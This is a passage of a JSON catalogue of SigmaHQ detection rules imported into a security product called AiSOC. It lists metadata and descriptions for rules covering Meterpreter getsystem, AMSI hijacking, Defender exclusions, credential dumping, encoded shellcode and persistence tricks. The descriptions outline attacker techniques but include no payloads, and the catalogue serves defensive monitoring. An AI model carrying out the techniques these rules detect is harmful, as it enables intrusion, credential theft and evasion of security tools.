"type": "detection", "name": "Potential Meterpreter/CobaltStrike Activity", "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-meterpreter-cobaltstrike-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15619216-e993-4721-b590-4c520615a67d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml" } }, { "id": "sigmahq-sigma-15904280-565c-4b73-9303-3291f964e7f9", "type": "detection", "name": "Potential Persistence Attempt Via ErrorHandler.Cmd", "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. 
Setup.exe) fail to run for any reason.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-attempt-via-errorhandler-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15904280-565c-4b73-9303-3291f964e7f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_errorhandler_persistence.yml" } }, { "id": "sigmahq-sigma-15b75071-74cc-47e0-b4c6-b43744a62a2b", "type": "detection", "name": "Suspicious Process Start Locations", "description": "Detects suspicious process run from unusual locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-start-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_run_locations.yml" } }, { "id": "sigmahq-sigma-15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "type": "detection", "name": "Rundll32 InstallScreenSaver 
Execution", "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-installscreensaver-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml" } }, { "id": "sigmahq-sigma-15c7904e-6ad1-4a45-9b46-5fb25df37fd2", "type": "detection", "name": "Malicious PE Execution by Microsoft Visual Studio Debugger", "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-pe-execution-by-microsoft-visual-studio-debugger.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"15c7904e-6ad1-4a45-9b46-5fb25df37fd2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" } }, { "id": "sigmahq-sigma-15ef3fac-f0f0-4dc4-ada0-660aa72980b3", "type": "detection", "name": "Azure Virtual Network Device Modified or Deleted", "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-virtual-network-device-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_network_virtual_device_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-160d2780-31f7-4922-8b3a-efce30e63e96", "type": "detection", "name": "Potential AMSI COM Server Hijacking", "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. 
This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-amsi-com-server-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "160d2780-31f7-4922-8b3a-efce30e63e96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml" } }, { "id": "sigmahq-sigma-16124c2d-e40b-4fcc-8f2c-5ab7870a2223", "type": "detection", "name": "AWS EC2 Disable EBS Encryption", "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1486", "T1565" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/cloud/aws-ec2-disable-ebs-encryption.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_ec2_disable_encryption.yml" } }, { "id": "sigmahq-sigma-162ab1e4-6874-4564-853c-53ec3ab8be01", 
"type": "detection", "name": "TeamViewer Remote Session", "description": "Detects the creation of log files during a TeamViewer remote session", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/teamviewer-remote-session.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "162ab1e4-6874-4564-853c-53ec3ab8be01", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" } }, { "id": "sigmahq-sigma-162e69a7-7981-4344-84a9-0f1c9a217a52", "type": "detection", "name": "Powershell Directory Enumeration", "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-directory-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "162e69a7-7981-4344-84a9-0f1c9a217a52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" } }, { 
"id": "sigmahq-sigma-164eda96-11b2-430b-85ff-6a265c15bf32", "type": "detection", "name": "Local Groups Reconnaissance Via Wmic.EXE", "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-groups-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "164eda96-11b2-430b-85ff-6a265c15bf32", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_group.yml" } }, { "id": "sigmahq-sigma-1667a172-ed4c-463c-9969-efd92195319a", "type": "detection", "name": "Okta Policy Modified or Deleted", "description": "Detects when an Okta policy is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-policy-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1667a172-ed4c-463c-9969-efd92195319a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_policy_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-166e9c50-8cd9-44af-815d-d1f0c0e90dde", "type": "detection", "name": "Suspicious Svchost Process Access", "description": "Detects suspicious access to the \"svchost\" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-svchost-process-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_svchost_susp_access_request.yml" } }, { "id": "sigmahq-sigma-16905e21-66ee-42fe-b256-1318ada2d770", "type": "detection", "name": "Start of NT Virtual DOS Machine", "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": 
false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/start-of-nt-virtual-dos-machine.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16905e21-66ee-42fe-b256-1318ada2d770", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" } }, { "id": "sigmahq-sigma-16a71777-0b2e-4db7-9888-9d59cb75200b", "type": "detection", "name": "Github Delete Action Invoked", "description": "Detects delete action in the Github audit logs for codespaces, environment, project and repo.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1213.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-delete-action-invoked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16a71777-0b2e-4db7-9888-9d59cb75200b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_delete_action_invoked.yml" } }, { "id": "sigmahq-sigma-16ab6143-510a-44e2-a615-bdb80b8317fc", "type": "detection", "name": "Bitbucket Global SSH Settings Changed", "description": "Detects Bitbucket global SSH access configuration changes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ 
"T1685", "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-global-ssh-settings-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16ab6143-510a-44e2-a615-bdb80b8317fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml" } }, { "id": "sigmahq-sigma-16b37b70-6fcf-4814-a092-c36bd3aafcbd", "type": "detection", "name": "PowerShell ShellCode", "description": "Detects Base64 encoded Shellcode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-shellcode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" } }, { "id": "sigmahq-sigma-16c37b52-b141-42a5-a3ea-bbe098444397", "type": "detection", "name": "Suspect Svchost Activity", "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspect-svchost-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16c37b52-b141-42a5-a3ea-bbe098444397", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml" } }, { "id": "sigmahq-sigma-16c86189-b556-4ee8-b4c7-7e350a195a4f", "type": "detection", "name": "Potential Server Side Template Injection In Velocity", "description": "Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-server-side-template-injection-in-velocity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16c86189-b556-4ee8-b4c7-7e350a195a4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/velocity/velocity_ssti_injection.yml" } }, { "id": "sigmahq-sigma-16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "type": 
"detection", "name": "RottenPotato Like Attack Pattern", "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rottenpotato-like-attack-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_susp_rottenpotato.yml" } }, { "id": "sigmahq-sigma-16fe46bb-4f64-46aa-817d-ff7bec4a2352", "type": "detection", "name": "LiveKD Driver Creation", "description": "Detects the creation of the LiveKD driver, which is used for live kernel debugging", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/livekd-driver-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16fe46bb-4f64-46aa-817d-ff7bec4a2352", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver.yml" } }, { "id": "sigmahq-sigma-1712bafe-be05-4a0e-89d4-17a3ed151bf5", "type": "detection", "name": "Potential Hello-World Scraper Botnet Activity", "description": "Detects network traffic potentially associated with a scraper botnet variant that uses the \"Hello-World/1.0\" user-agent string.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-hello-world-scraper-botnet-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1712bafe-be05-4a0e-89d4-17a3ed151bf5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_hello_world_user_agent.yml" } }, { "id": "sigmahq-sigma-1723e720-616d-4ddc-ab02-f7e3685a4713", "type": "detection", "name": "Rundll32 Spawned Via Explorer.EXE", "description": "Detects execution of \"rundll32.exe\" with a parent process of Explorer.exe. 
This has been observed by variants of Raspberry Robin, as first reported by Red Canary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-spawned-via-explorer-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1723e720-616d-4ddc-ab02-f7e3685a4713", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" } }, { "id": "sigmahq-sigma-174afcfa-6e40-4ae9-af64-496546389294", "type": "detection", "name": "Credential Dumping Attempt Via Svchost", "description": "Detects when a process tries to access the memory of svchost to potentially dump credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credential-dumping-attempt-via-svchost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "174afcfa-6e40-4ae9-af64-496546389294", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_svchost_credential_dumping.yml" } }, { "id": 
"sigmahq-sigma-175997c5-803c-4b08-8bb0-70b099f47595", "type": "detection", "name": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-compress-obfuscation-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "175997c5-803c-4b08-8bb0-70b099f47595", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml" } }, { "id": "sigmahq-sigma-1775e15e-b61b-4d14-a1a3-80981298085a", "type": "detection", "name": "Rundll32 Execution Without CommandLine Parameters", "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-execution-without-commandline-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1775e15e-b61b-4d14-a1a3-80981298085a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_no_params.yml" } }, { "id": "sigmahq-sigma-17769c90-230e-488b-a463-e05c08e9d48f", "type": "detection", "name": "Powershell Defender Exclusion", "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-defender-exclusion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "17769c90-230e-488b-a463-e05c08e9d48f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" } }, { "id": "sigmahq-sigma-178e615d-e666-498b-9630-9ed363038101", "type": "detection", "name": "Elevated System Shell Spawned From Uncommon Parent Location", "description": "Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/elevated-system-shell-spawned-from-uncommon-parent-location.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "178e615d-e666-498b-9630-9ed363038101", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml" } }, { "id": "sigmahq-sigma-179b3686-6271-4d87-807d-17d843a8af73", "type": "detection", "name": "Suspicious Filename with Embedded Base64 Commands", "description": "Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts.\nThese filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-filename-with-embedded-base64-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "179b3686-6271-4d87-807d-17d843a8af73", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_susp_filename_with_embedded_base64_command.yml" } }, { "id": "sigmahq-sigma-17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "type": "detection", "name": "Suspicious New Service Creation", "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-new-service-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_service_creation.yml" } }, { "id": "sigmahq-sigma-17d619c1-e020-4347-957e-1d1207455c93", "type": "detection", "name": "Active Directory Replication from Non Machine Account", "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-replication-from-non-machine-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "17d619c1-e020-4347-957e-1d1207455c93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 